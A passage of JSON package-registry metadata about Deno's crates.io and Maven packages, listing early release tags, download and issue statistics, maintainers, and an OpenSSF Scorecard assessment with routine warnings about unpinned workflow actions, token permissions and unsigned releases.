/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T22:23:54.735Z","dependent_packages_count":1,"downloads":36844,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":59.291808326383986,"dependent_repos_count":29.318292202377133,"dependent_packages_count":16.95609541526534,"stargazers_count":0.028408309888841035,"forks_count":0.08705772385289993,"average":21.13633239555364},"purl":"pkg:cargo/deno_snapshots","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_snapshots","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_snapshots","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_snapshots/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_snapshots/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-03-03T20:26:13.884Z","updated_at":"2025-03-03T20:26:13.884Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-01-19T09:43:13.989Z","updated_at":"2025-01-19T09:43:13.989Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12401479,"name":"org.mvnpm.at.deno:darwin-x64","ecosystem":"maven","description":"darwin-x64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":18,"first_release_published_at":"2025-10-20T11:29:27.000Z","latest_release_published_at":"2026-08-30T02:06:29.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:54:36.896Z","created_at":"2025-10-20T11:46:22.614Z","updated_at":"2026-09-07T22:54:36.896Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/darwin-x64/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/darwin-x64/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: 